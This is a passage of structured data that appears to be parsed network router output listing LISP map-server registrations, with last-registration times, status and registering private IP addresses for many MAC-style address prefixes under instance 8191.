"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"1c6a.7aff.9d1f/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"1c6a.7aff.a284/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"1c6a.7aff.a286/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"1c6a.7aff.a382/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"1c6a.7aff.aabc/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1c6a.7aff.adb9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"1c6a.7aff.afa7/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"1c6a.7aff.b592/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"1c6a.7aff.b5b4/48": {
"last_register": "00:04:01",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"1c6a.7aff.b696/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"1c6a.7aff.b703/48": {
"last_register": "1d05h",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"1c6a.7aff.b957/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c6a.7aff.b9a9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"1c6a.7aff.c76c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1c6a.7aff.c853/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c6a.7aff.d203/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1c6a.7aff.d499/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"1c6a.7aff.dc90/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"1c6a.7aff.df2f/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1c6a.7aff.e49b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"1c6a.7aff.e741/48": {
"last_register": "5d23h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"1c6a.7aff.e8be/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"1c6a.7aff.f1f8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1c6a.7aff.f115/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"1c6a.7aff.fb74/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"1c6a.7aff.fc99/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"1c6a.7aff.0021/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"1c6a.7aff.0318/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"1ce8.5dff.dd5f/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"1ce8.5dff.fe12/48": {
"last_register": "2d00h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"1ce8.5dff.b80d/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"203a.07ff.6701/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.23:20011",
"inst_id": 8191,
},
"203a.07ff.6ada/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"24b6.57ff.41c7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"2834.a2ff.7029/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"2c01.b5ff.1828/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"2c01.b5ff.1a87/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"2c01.b5ff.1e92/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"2c01.b5ff.c320/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"2c01.b5ff.c356/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"2c01.b5ff.c620/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"2c01.b5ff.ca1f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"2c01.b5ff.dd0c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"2c0b.e9ff.ca4c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.65:31210",
"inst_id": 8191,
},
"2c31.24ff.60f0/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"2c31.24ff.6000/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"2c31.24ff.8713/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"2c31.24ff.adb3/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"2c31.24ff.4e76/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"2c31.24ff.b476/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"2c31.24ff.ebc7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"2c3e.cfff.1d6d/48": {
"last_register": "3d10h",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"2c86.d2ff.9612/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"2cab.ebff.946a/48": {
"last_register": "00:03:52",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"34bd.c8ff.505f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"34bd.c8ff.0c1c/48": {
"last_register": "23:57:44",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"34db.fdff.d2a8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"3c0e.23ff.9056/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.d039/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.d198/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.d24b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.d47e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.d591/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.6a94/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"3c0e.23ff.6ad8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.6a42/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.6b89/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.6bc4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"3c0e.23ff.6b46/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.6c79/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"3c0e.23ff.6c13/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.6eaa/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"3c0e.23ff.6f88/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.2ba4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.2baf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.2bce/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.2c16/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.2c1e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"3c0e.23ff.2c67/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"3c0e.23ff.2ddd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"3c0e.23ff.2e52/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"3c0e.23ff.2e59/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"3c0e.23ff.2f87/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c0e.23ff.2f89/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"3c0e.23ff.2f92/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"3c41.0eff.bea6/48": {
"last_register": "08:34:00",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"3c41.0eff.bff0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"3c41.0eff.c48e/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"3c41.0eff.d445/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.172:11801",
"inst_id": 8191,
},
"3c41.0eff.d547/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"3c41.0eff.dda5/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"3c41.0eff.e459/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.184:44273",
"inst_id": 8191,
},
"3c41.0eff.e492/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"3c41.0eff.e5b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"3c41.0eff.6699/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"3c41.0eff.67bc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.252:16799",
"inst_id": 8191,
},
"44e4.d9ff.de32/48": {
"last_register": "00:34:58",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"4cbc.48ff.6f0a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"4ce1.76ff.cba6/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"5006.abff.8996/48": {
"last_register": "06:13:25",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"5006.abff.8aa1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"5006.abff.8e76/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"5006.abff.e937/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"5006.abff.ec31/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"5006.abff.51b1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"5006.abff.52d4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.5f07/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.66c3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"5006.abff.6a5c/48": {
"last_register": "04:14:18",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"5006.abff.6ba0/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"5006.abff.75f3/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"5006.abff.779d/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"5006.abff.7a67/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.7d1c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.30:20273",
"inst_id": 8191,
},
"5006.abff.7e9c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.184:44273",
"inst_id": 8191,
},
"5006.abff.9ab7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"5006.abff.9d0f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"5006.abff.a0cf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.a5a0/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"5006.abff.ab97/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"5006.abff.abdf/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.ac81/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.acd2/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"5006.abff.aeb8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.aedc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.afba/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.aff9/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.af15/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5006.abff.b410/48": {
"last_register": "04:10:51",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"5006.abff.3262/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"5006.abff.3274/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"5017.ffff.75c9/48": {
"last_register": "1d22h",
"up": "yes#",
"who_last_registered": "10.8.129.129:32741",
"inst_id": 8191,
},
"501c.bfff.c2a7/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"50f7.22ff.8d1a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"50f7.22ff.ce8a/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.138:21275",
"inst_id": 8191,
},
"50f7.22ff.d3e4/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"5897.1eff.35dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"5897.bdff.8bb1/48": {
"last_register": "00:03:16",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"5897.bdff.9031/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"58ac.78ff.3fdc/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"58ac.78ff.3f35/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"58ac.78ff.478f/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"58ac.78ff.7772/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"58ac.78ff.7774/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"58ac.78ff.7775/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"58ac.78ff.777b/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.225:16171",
"inst_id": 8191,
},
"58ac.78ff.777d/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"58ac.78ff.7c1f/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"58ac.78ff.7dce/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"58ac.78ff.7dcf/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"5c50.15ff.71b8/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"5c50.15ff.7c03/48": {
"last_register": "00:46:31",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"5c83.8fff.87b6/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"5c83.8fff.a1d8/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"5c83.8fff.b57e/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"5c83.8fff.b5b4/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"5c83.8fff.b5b6/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"5c83.8fff.b5bb/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"5c83.8fff.b5c2/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"5c83.8fff.b5db/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"5c83.8fff.bff2/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"5c83.8fff.bf1b/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"5c83.8fff.ccc9/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"5c83.8fff.cc04/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"5c83.8fff.cc3a/48": {
"last_register": "2d23h",
"up": "yes#",
"who_last_registered": "10.8.129.33:17709",
"inst_id": 8191,
},
"5c83.8fff.cc3b/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"5c83.8fff.cc4a/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"5c83.8fff.d509/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"5c83.8fff.d510/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"5c83.8fff.d511/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"5c83.8fff.d519/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.135:31929",
"inst_id": 8191,
},
"5c83.8fff.d51a/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"5c83.8fff.e6b3/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"5c83.8fff.f713/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"5c83.8fff.0717/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.17:12848",
"inst_id": 8191,
},
"5c83.8fff.3de7/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.185:21744",
"inst_id": 8191,
},
"5c83.8fff.b69b/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"5c83.8fff.b6a2/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"5c83.8fff.b6a3/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"5c83.8fff.b6ab/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"5c83.8fff.b6c6/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.152:20085",
"inst_id": 8191,
},
"5c83.8fff.b7e0/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"5c83.8fff.b7e2/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.147:40916",
"inst_id": 8191,
},
"5c83.8fff.b789/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"5c83.8fff.d22a/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.140:30271",
"inst_id": 8191,
},
"649e.f3ff.88c1/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"649e.f3ff.898f/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"649e.f3ff.89ce/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.128.178:28565",
"inst_id": 8191,
},
"649e.f3ff.89eb/48": {
"last_register": "1w2d",
"up": "yes#",
"who_last_registered": "10.8.128.167:48866",
"inst_id": 8191,
},
"649e.f3ff.894f/48": {
"last_register": "1d00h",
"up": "yes#",
"who_last_registered": "10.8.128.173:32229",
"inst_id": 8191,
},
"649e.f3ff.8f23/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"649e.f3ff.90dc/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"649e.f3ff.91ab/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.113:24192",
"inst_id": 8191,
},
"649e.f3ff.9536/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"649e.f3ff.9791/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.1:25983",
"inst_id": 8191,
},
"649e.f3ff.c886/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.22:50531",
"inst_id": 8191,
},
"649e.f3ff.cca8/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.129.44:27830",
"inst_id": 8191,
},
"649e.f3ff.e91c/48": {
"last_register": "1d12h",
"up": "yes#",
"who_last_registered": "10.8.129.106:18298",
"inst_id": 8191,
},
"649e.f3ff.eb96/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.107:24262",
"inst_id": 8191,
},
"649e.f3ff.ec62/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"649e.f3ff.ecfd/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.118:38318",
"inst_id": 8191,
},
"649e.f3ff.f75c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"649e.f3ff.0c0e/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.141:39931",
"inst_id": 8191,
},
"649e.f3ff.306c/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"649e.f3ff.594b/48": {
"last_register": "2w1d",
"up": "yes#",
"who_last_registered": "10.8.129.112:11299",
"inst_id": 8191,
},
"64f6.9dff.c957/48": {
"last_register": "1d19h",
"up": "yes#",
"who_last_registered": "10.8.129.125:21918",
"inst_id": 8191,
},
"64f6.9dff.275f/48": {
"last_register": "1w3d",
"up": "yes#",
"who_last_registered": "10.8.128.254:32391",
"inst_id": 8191,
},
"64f6.9dff.83bd/48": {
"last_register": "04:03:45",
"up": "yes#",
